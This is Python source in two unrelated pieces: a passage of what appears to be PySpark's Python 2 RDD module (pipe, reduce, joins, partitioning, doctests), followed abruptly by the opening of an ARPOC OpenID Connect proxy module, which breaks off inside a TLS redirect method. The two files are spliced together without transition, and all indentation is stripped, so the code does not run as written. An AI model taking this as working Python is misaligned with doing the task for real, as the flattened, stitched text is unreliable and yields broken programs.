fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda (k, v): k).collect()
samples = sorted(samples, reverse=(not ascending), key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
for i in range(0, numPartitions - 1):
index = (len(samples) - 1) * (i + 1) / numPartitions
bounds.append(samples[index])
def rangePartitionFunc(k):
p = 0
while p < len(bounds) and keyfunc(k) > bounds[p]:
p += 1
if ascending:
return p
else:
return numPartitions-1-p
def mapFunc(iterator):
yield sorted(iterator, reverse=(not ascending), key=lambda (k, v): keyfunc(k))
return (self.partitionBy(numPartitions, partitionFunc=rangePartitionFunc)
.mapPartitions(mapFunc,preservesPartitioning=True)
.flatMap(lambda x: x, preservesPartitioning=True))
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator): yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
>>> result = rdd.groupBy(lambda x: x % 2).collect()
>>> sorted([(x, sorted(y)) for (x, y) in result])
[(0, [2, 8]), (1, [1, 1, 3, 5])]
"""
return self.map(lambda x: (f(x), x)).groupByKey(numPartitions)
def pipe(self, command, env={}):
"""
Return an RDD created by piping elements to a forked external process.
>>> sc.parallelize(['1', '2', '', '3']).pipe('cat').collect()
['1', '2', '', '3']
"""
def func(iterator):
pipe = Popen(shlex.split(command), env=env, stdin=PIPE, stdout=PIPE)
def pipe_objs(out):
for obj in iterator:
out.write(str(obj).rstrip('\n') + '\n')
out.close()
Thread(target=pipe_objs, args=[pipe.stdin]).start()
return (x.rstrip('\n') for x in iter(pipe.stdout.readline, ''))
return self.mapPartitions(func)
def foreach(self, f):
"""
Applies a function to all elements of this RDD.
>>> def f(x): print x
>>> sc.parallelize([1, 2, 3, 4, 5]).foreach(f)
"""
def processPartition(iterator):
for x in iterator:
f(x)
yield None
self.mapPartitions(processPartition).collect() # Force evaluation
def foreachPartition(self, f):
"""
Applies a function to each partition of this RDD.
>>> def f(iterator):
... for x in iterator:
... print x
... yield None
>>> sc.parallelize([1, 2, 3, 4, 5]).foreachPartition(f)
"""
self.mapPartitions(f).collect() # Force evaluation
def collect(self):
"""
Return a list that contains all of the elements in this RDD.
"""
with _JavaStackTrace(self.context) as st:
bytesInJava = self._jrdd.collect().iterator()
return list(self._collect_iterator_through_file(bytesInJava))
def _collect_iterator_through_file(self, iterator):
# Transferring lots of data through Py4J can be slow because
# socket.readline() is inefficient. Instead, we'll dump the data to a
# file and read it back.
tempFile = NamedTemporaryFile(delete=False, dir=self.ctx._temp_dir)
tempFile.close()
self.ctx._writeToFile(iterator, tempFile.name)
# Read the data into Python and deserialize it:
with open(tempFile.name, 'rb') as tempFile:
for item in self._jrdd_deserializer.load_stream(tempFile):
yield item
os.unlink(tempFile.name)
def reduce(self, f):
"""
Reduces the elements of this RDD using the specified commutative and
associative binary operator. Currently reduces partitions locally.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).reduce(add)
15
>>> sc.parallelize((2 for _ in range(10))).map(lambda x: 1).cache().reduce(add)
10
"""
def func(iterator):
acc = None
for obj in iterator:
if acc is None:
acc = obj
else:
acc = f(obj, acc)
if acc is not None:
yield acc
vals = self.mapPartitions(func).collect()
return reduce(f, vals)
def fold(self, zeroValue, op):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given associative function and a neutral "zero
value."
The function C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
>>> from operator import add
>>> sc.parallelize([1, 2, 3, 4, 5]).fold(0, add)
15
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = op(obj, acc)
yield acc
vals = self.mapPartitions(func).collect()
return reduce(op, vals, zeroValue)
def aggregate(self, zeroValue, seqOp, combOp):
"""
Aggregate the elements of each partition, and then the results for all
the partitions, using a given combine functions and a neutral "zero
value."
The functions C{op(t1, t2)} is allowed to modify C{t1} and return it
as its result value to avoid object allocation; however, it should not
modify C{t2}.
The first function (seqOp) can return a different result type, U, than
the type of this RDD. Thus, we need one operation for merging a T into an U
and one operation for merging two U
>>> seqOp = (lambda x, y: (x[0] + y, x[1] + 1))
>>> combOp = (lambda x, y: (x[0] + y[0], x[1] + y[1]))
>>> sc.parallelize([1, 2, 3, 4]).aggregate((0, 0), seqOp, combOp)
(10, 4)
>>> sc.parallelize([]).aggregate((0, 0), seqOp, combOp)
(0, 0)
"""
def func(iterator):
acc = zeroValue
for obj in iterator:
acc = seqOp(acc, obj)
yield acc
return self.mapPartitions(func).fold(zeroValue, combOp)
def max(self):
"""
Find the maximum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).max()
43.0
"""
return self.reduce(max)
def min(self):
"""
Find the maximum item in this RDD.
>>> sc.parallelize([1.0, 5.0, 43.0, 10.0]).min()
1.0
"""
return self.reduce(min)
def sum(self):
"""
Add up the elements in this RDD.
>>> sc.parallelize([1.0, 2.0, 3.0]).sum()
6.0
"""
return self.mapPartitions(lambda x: [sum(x)]).reduce(operator.add)
def count(self):
"""
Return the number of elements in this RDD.
>>> sc.parallelize([2, 3, 4]).count()
3
"""
return self.mapPartitions(lambda i: [sum(1 for _ in i)]).sum()
def stats(self):
"""
Return a L{StatCounter} object that captures the mean, variance
and count of the RDD's elements in one operation.
"""
def redFunc(left_counter, right_counter):
return left_counter.mergeStats(right_counter)
return self.mapPartitions(lambda i: [StatCounter(i)]).reduce(redFunc)
def mean(self):
"""
Compute the mean of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).mean()
2.0
"""
return self.stats().mean()
def variance(self):
"""
Compute the variance of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).variance()
0.666...
"""
return self.stats().variance()
def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which corrects for bias in
estimating the standard deviation by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects for bias in
estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num):
"""
Get the top N elements from a RDD.
Note: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).cache().top(2)
[6, 5]
"""
def topIterator(iterator):
q = []
for k in iterator:
if len(q) < num:
heapq.heappush(q, k)
else:
heapq.heappushpop(q, k)
yield q
def merge(a, b):
return next(topIterator(a + b))
return sorted(self.mapPartitions(topIterator).reduce(merge), reverse=True)
def takeOrdered(self, num, key=None):
"""
Get the N elements from a RDD ordered in ascending order or as specified
by the optional key function.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def topNKeyedElems(iterator, key_=None):
q = MaxHeapQ(num)
for k in iterator:
if key_ != None:
k = (key_(k), k)
q.insert(k)
yield q.getElements()
def unKey(x, key_=None):
if key_ != None:
x = [i[1] for i in x]
return x
def merge(a, b):
return next(topNKeyedElems(a + b))
result = self.mapPartitions(lambda i: topNKeyedElems(i, key)).reduce(merge)
return sorted(unKey(result, key), key=key)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self._jrdd.splits().size()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the first iteration, just
# try all partitions next. Otherwise, interpolate the number
# of partitions we need to try, but overestimate it by 50%.
if len(items) == 0:
numPartsToTry = totalParts - 1
else:
numPartsToTry = int(1.5 * num * partsScanned / len(items))
left = num - len(items)
def takeUpToNumLeft(iterator):
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p, True)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
"""
return self.take(1)[0]
def saveAsTextFile(self, path):
"""
Save this RDD as a text file, using string representations of elements.
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, basestring):
x = unicode(x)
yield x.encode("utf-8")
keyed = PipelinedRDD(self, func)
keyed._bypass_serializer = True
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda (k, v): k)
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda (k, v): v)
def reduceByKey(self, func, numPartitions=None):
"""
Merge the values for each key using an associative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be hash-partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
def reducePartition(iterator):
m = {}
for (k, v) in iterator:
m[k] = v if k not in m else func(m[k], v)
yield m
def mergeMaps(m1, m2):
for (k, v) in m2.iteritems():
m1[k] = v if k not in m1 else func(m1[k], v)
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in other have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
def partitionBy(self, numPartitions, partitionFunc=None):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> set(sets[0]).intersection(set(sets[1]))
set([])
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
if partitionFunc is None:
partitionFunc = lambda x: 0 if x is None else hash(x)
# Transferring O(n) objects to Java is too expensive. Instead, we'll
# form the hash buckets in Python, transferring O(numPartitions) objects
# to Java. Each object is a (splitNumber, [objects]) pair.
outputSerializer = self.ctx._unbatched_serializer
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
for (k, v) in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
for (split, items) in buckets.iteritems():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = PipelinedRDD(self, add_shuffle_key)
keyed._bypass_serializer = True
with _JavaStackTrace(self.context) as st:
pairRDD = self.ctx._jvm.PairwiseRDD(keyed._jrdd.rdd()).asJavaPairRDD()
partitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = pairRDD.partitionBy(partitioner).values()
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
# This is required so that id(partitionFunc) remains unique, even if
# partitionFunc is a lambda:
rdd._partitionFunc = partitionFunc
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C. Note that V and C can be different -- for example, one might
group an RDD of type (Int, Int) into an RDD of type (Int, List[Int]).
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one.
In addition, users can control the partitioning of the output RDD.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> def f(x): return x
>>> def add(a, b): return a + str(b)
>>> sorted(x.combineByKey(str, add, add).collect())
[('a', '11'), ('b', '1')]
"""
if numPartitions is None:
numPartitions = self.ctx.defaultParallelism
def combineLocally(iterator):
combiners = {}
for x in iterator:
(k, v) = x
if k not in combiners:
combiners[k] = createCombiner(v)
else:
combiners[k] = mergeValue(combiners[k], v)
return combiners.iteritems()
locally_combined = self.mapPartitions(combineLocally)
shuffled = locally_combined.partitionBy(numPartitions)
def _mergeCombiners(iterator):
combiners = {}
for (k, v) in iterator:
if not k in combiners:
combiners[k] = v
else:
combiners[k] = mergeCombiners(combiners[k], v)
return combiners.iteritems()
return shuffled.mapPartitions(_mergeCombiners)
def foldByKey(self, zeroValue, func, numPartitions=None):
"""
Merge the values for each key using an associative function "func" and a neutral "zeroValue"
which may be added to the result an arbitrary number of times, and must not change
the result (e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> rdd.foldByKey(0, add).collect()
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda v: func(zeroValue, v), func, func, numPartitions)
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with into numPartitions partitions.
Note: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey will provide much better
performance.
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> map((lambda (x,y): (x, list(y))), sorted(x.groupByKey().collect()))
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
return a + b
return self.combineByKey(createCombiner, mergeValue, mergeCombiners,
numPartitions).mapValues(lambda x: ResultIterable(x))
# TODO: add tests
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda (k, v): ((k, x) for x in f(v))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda (k, v): (k, f(v))
return self.map(map_values_fn, preservesPartitioning=True)
# TODO: support varargs cogroup of several RDDs.
def groupWith(self, other):
"""
Alias for cogroup.
"""
return self.cogroup(other)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as well
as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> map((lambda (x,y): (x, (list(y[0]), list(y[1])))), sorted(list(x.cogroup(y).collect())))
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup(self, other, numPartitions)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching key
in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
filter_func = lambda (key, vals): len(vals[0]) > 0 and len(vals[1]) == 0
map_func = lambda (key, vals): [(key, val) for val in vals[0]]
return self.cogroup(other, numPartitions).filter(filter_func).flatMap(map_func)
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
rdd = other.map(lambda x: (x, True)) # note: here 'True' is just a placeholder
return self.map(lambda x: (x, True)).subtractByKey(rdd).map(lambda tpl: tpl[0]) # note: here 'True' is just a placeholder
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> map((lambda (x,y): (x, (list(y[0]), (list(y[1]))))), sorted(x.cogroup(y).collect()))
[(0, ([0], [0])), (1, ([1], [1])), (2, ([], [2])), (3, ([], [3])), (4, ([2], [4]))]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD. Internally, this uses
a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider using `coalesce`,
which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
jrdd = self._jrdd.repartition(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
jrdd = self._jrdd.coalesce(numPartitions)
return RDD(jrdd, self.ctx, self._jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the first element in each RDD
second element in each RDD, etc. Assumes that the two RDDs have the same number of
partitions and the same number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def name(self):
"""
Return the name of this RDD.
"""
name_ = self._jrdd.name()
if not name_:
return None
return name_.encode('utf-8')
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.setName('RDD1')
>>> rdd1.name()
'RDD1'
"""
self._jrdd.setName(name)
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if not debug_string:
return None
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
# TODO: `lookup` is disabled because we can't make direct comparisons based
# on the key; we need to compare the hash of the key to the hash of the
# keys in the pairs. This could be an expensive operation, since those
# hashes aren't retained.
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
serializer = NoOpSerializer()
else:
serializer = self.ctx.serializer
command = (self.func, self._prev_jrdd_deserializer, serializer)
pickled_command = CloudPickleSerializer().dumps(command)
broadcast_vars = ListConverter().convert(
[x._jbroadcast for x in self.ctx._pickled_broadcast_vars],
self.ctx._gateway._gateway_client)
self.ctx._pickled_broadcast_vars.clear()
class_tag = self._prev_jrdd.classTag()
env = MapConverter().convert(self.ctx.environment,
self.ctx._gateway._gateway_client)
includes = ListConverter().convert(self.ctx._python_includes,
self.ctx._gateway._gateway_client)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(),
bytearray(pickled_command), env, includes, self.preservesPartitioning,
self.ctx.pythonExec, broadcast_vars, self.ctx._javaAccumulator,
class_tag)
self._jrdd_val = python_rdd.asJavaRDD()
return self._jrdd_val
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest', batchSize=2)
(failure_count, test_count) = doctest.testmod(globs=globs,optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
__init__.py | """ Main module of the ARPOC """
# Python imports
import logging
import logging.config
import warnings
import copy
import argparse
# For scheduling auth & registration to providers
import sched
import threading
import time
import importlib.resources
import os
import pwd
import grp
import hashlib
import urllib.parse
from http.client import HTTPConnection
#HTTPConnection.debuglevel = 1
from dataclasses import dataclass, field
from typing import List, Dict, Union, Tuple, Callable, Iterable, Optional, Any
# side packages
##oic
import oic.oic
from oic.utils.authn.client import CLIENT_AUTHN_METHOD
from oic.oic.message import RegistrationResponse, AuthorizationResponse
from oic import rndstr
from oic.utils.http_util import Redirect
import oic.extension.client
import oic.exception
import yaml
import requests
import cherrypy
from cherrypy._cpdispatch import Dispatcher
from cherrypy.process.plugins import DropPrivileges, Daemonizer, PIDFile
from jinja2 import Environment, FileSystemLoader
from jwkest import jwt
#### Own Imports
from arpoc.base import ServiceProxy, OidcHandler, TLSOnlyDispatcher
import arpoc.ac as ac
import arpoc.exceptions
import arpoc.config as config
import arpoc.pap
import arpoc.special_pages
import arpoc.cache
import arpoc.utils
from arpoc.plugins import EnvironmentDict, ObjectDict, ObligationsDict
#logging.basicConfig(level=logging.DEBUG)
LOGGING = logging.getLogger(__name__)
env = Environment(loader=FileSystemLoader(
os.path.join(os.path.dirname(__file__), 'resources', 'templates')))
class App:
""" Class for application handling.
Reads configuration files,
setups the oidc client classes
and the dispatcher for the services"""
def __init__(self) -> None:
self._scheduler = sched.scheduler(time.time, time.sleep)
self.thread = threading.Thread(target=self._scheduler.run)
self.oidc_handler: OidcHandler
self.config: config.OIDCProxyConfig
self.uid = 0
self.gid = 0
def cancel_scheduler(self):
""" Cancels every event in the scheduler queue """
if not self._scheduler.empty():
for event in self._scheduler.queue:
self._scheduler.cancel(event)
self.thread.join()
def setup_loggers(self) -> None:
""" Read the loggers configuration and configure the loggers"""
with importlib.resources.path(
'arpoc.resources',
'loggers.yml') as loggers_path, open(loggers_path) as ymlfile:
log_config_str = ymlfile.read()
log_config_str = log_config_str.replace('DEFAULTLEVEL',
self.config.misc.log_level)
log_config_str = log_config_str.replace(
'ACCESS_LOG', self.config.misc.access_log)
log_config_str = log_config_str.replace('ERROR_LOG',
self.config.misc.error_log)
log_conf = yaml.safe_load(log_config_str)
logging.config.dictConfig(log_conf)
def retry(self,
function: Callable,
exceptions: Tuple,
*args: Any,
retries: int = 5,
retry_delay: int = 30) -> None:
""" Retries function <retries> times, as long as <exceptions> are thrown"""
try:
function(*args)
except exceptions as excep:
if retries > 0:
LOGGING.debug(
"Retrying %s, parameters %s, failed with exception %s",
function, args,
type(excep).__name__)
LOGGING.debug("Delaying for %s seconds", retry_delay)
self._scheduler.enter(retry_delay,
1,
self.retry,
(function, exceptions, *args),
kwargs={
'retries': retries - 1,
'retry_delay': retry_delay
})
def tls_redirect(self, *args: Any, **kwargs: Any) -> None:
url = cherrypy.url(qs=cherrypy.request.query_string)
# find starting / of path
index = url.index('/', len('http://')) +1
path = url[index:]
https_url = "{}{}".format(self.config.proxy.baseuri, path)
